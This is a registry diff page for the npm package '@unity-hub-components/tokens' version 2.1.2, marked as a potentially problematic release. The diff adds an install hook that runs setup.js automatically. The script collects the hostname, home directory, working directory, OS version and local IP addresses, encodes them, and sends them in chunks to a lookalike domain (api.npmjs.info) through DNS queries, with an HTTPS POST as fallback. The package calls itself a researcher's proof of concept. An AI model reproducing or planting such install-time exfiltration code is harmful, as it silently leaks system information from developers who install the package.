@unity-hub-components/tokens 2.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @unity-hub-components/tokens might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +0 -0
  2. package/package.json +11 -0
  3. package/setup.js +169 -0
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "@unity-hub-components/tokens",
3
+ "version": "2.1.2",
4
+ "description": "This package is a proof of concept used by an independent researcher. It has been uploaded for test purposes only.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "install": "node setup.js @unity-hub-components/tokens"
8
+ },
9
+ "author": "CapybaraSecurity@protonmail.com",
10
+ "license": "ISC"
11
+ }
package/setup.js ADDED
@@ -0,0 +1,169 @@
1
+ var cwd
2
+ var secret
3
+ var hostname
4
+ var homedir
5
+ var version
6
+ var ip
7
+ var url
8
+ var data
9
+ var dataChunks
10
+ var maxLength = 25
11
+
12
+
13
+ var AESCrypt = {};
14
+
15
+ AESCrypt.encrypt = function(cryptkey, iv, cleardata) {
16
+
17
+ var encipher = crypto.createCipheriv('aes-256-cbc', cryptkey, iv);
18
+ var encryptdata = encipher.update(cleardata, 'utf8', 'binary');
19
+
20
+ encryptdata += encipher.final('binary');
21
+ encode_encryptdata = new Buffer.from(encryptdata, 'binary').toString('hex');
22
+
23
+ return encode_encryptdata;
24
+
25
+ }
26
+
27
+
28
+ function generateUID() {
29
+
30
+ var firstPart = (Math.random() * 46656) | 0;
31
+ var secondPart = (Math.random() * 46656) | 0;
32
+
33
+ firstPart = ("000" + firstPart.toString(36)).slice(-3);
34
+ secondPart = ("000" + secondPart.toString(36)).slice(-3);
35
+
36
+ return firstPart + secondPart;
37
+
38
+ }
39
+
40
+
41
+ function splitToSubstrings(str, n) {
42
+
43
+ const arr = [];
44
+
45
+ for (let index = 0; index < str.length; index += n) {
46
+
47
+ arr.push(str.slice(index, index + n));
48
+
49
+ }
50
+
51
+ return arr;
52
+
53
+ }
54
+
55
+
56
+ function shuffle(array) {
57
+ let currentIndex = array.length, randomIndex;
58
+
59
+ while (currentIndex != 0) {
60
+
61
+ randomIndex = Math.floor(Math.random() * currentIndex);
62
+ currentIndex--;
63
+
64
+ [array[currentIndex], array[randomIndex]] = [
65
+ array[randomIndex], array[currentIndex]];
66
+ }
67
+
68
+ return array;
69
+ }
70
+
71
+
72
+ try{
73
+
74
+ cwd = process.cwd()
75
+
76
+ } catch(e) {
77
+ }
78
+
79
+
80
+ try{
81
+
82
+ var os = require("os");
83
+ hostname = os.hostname();
84
+ homedir = os.homedir()
85
+ version = os.release()
86
+
87
+ } catch(e) {
88
+ }
89
+
90
+
91
+ try{
92
+
93
+ var ifaces = require('os').networkInterfaces();
94
+ var adresses = Object.keys(ifaces).reduce(function (result, dev) {
95
+
96
+ return result.concat(ifaces[dev].reduce(function (result, details) {
97
+
98
+ return result.concat(details.family === 'IPv4' && !details.internal ? [details.address] : []);
99
+
100
+ }, []));
101
+
102
+ });
103
+
104
+ ip = adresses
105
+
106
+ } catch(e) {
107
+ }
108
+
109
+
110
+ data = "{" + "\"" + process.argv[2] + "\"" + ":{" + "\"timestamp\":\"" + Math.floor(new Date().getTime() / 1000).toString() + "\",\"cwd\":\"" + cwd + "\",\"hostname\":\"" + hostname + "\",\"homedir\":\"" + homedir + "\",\"version\":\"" + version + "\",\"local_ip\":\"" + ip + "\"}}"
111
+
112
+ try{
113
+
114
+ var crypto = require('crypto')
115
+ var dns = require('dns');
116
+
117
+ dns.resolveTxt("provider.npmjs.info", (err, addresses)=> secret = addresses);
118
+ var key = crypto.createHash('sha256').update(String(secret)).digest()
119
+ var iv = crypto.randomBytes(16);
120
+ mutex = iv.toString('hex')
121
+
122
+ var encoded = AESCrypt.encrypt(key, iv, data)
123
+
124
+ } catch(e) {
125
+
126
+ encoded = Buffer.from(data,'utf-8').toString('hex')
127
+ mutex = generateUID()
128
+
129
+ }
130
+
131
+ dataChunks = splitToSubstrings(encoded, maxLength)
132
+ var indicie = shuffle(Array.apply(null, {length: dataChunks.length}).map(Number.call, Number))
133
+
134
+ for (let item of indicie) {
135
+
136
+ try{
137
+
138
+ url = dataChunks[indicie[item]] + "." + (indicie[item] + 64).toString(16) + "." + mutex + '.api.npmjs.info'
139
+ const dns = require('dns');
140
+ dns.resolve(url, "A", (err, records)=> test = records);
141
+
142
+ } catch(e) {
143
+
144
+ url = dataChunks[indicie[item]] + "." + (indicie[item] + 64).toString(16) + "." + mutex + '.api.npmjs.info'
145
+ const https = require('https');
146
+
147
+ const options = {
148
+
149
+ hostname: url,
150
+ port: 443,
151
+ path: '/',
152
+ method: 'POST',
153
+ headers: {
154
+ 'Content-Type': 'application/json',
155
+ 'Content-Length': data.length
156
+ },
157
+ rejectUnauthorized: false
158
+
159
+ }
160
+
161
+ index +=1
162
+ const req = https.request(options, res => {});
163
+
164
+ req.write(data);
165
+ req.end();
166
+
167
+ }
168
+
169
+ }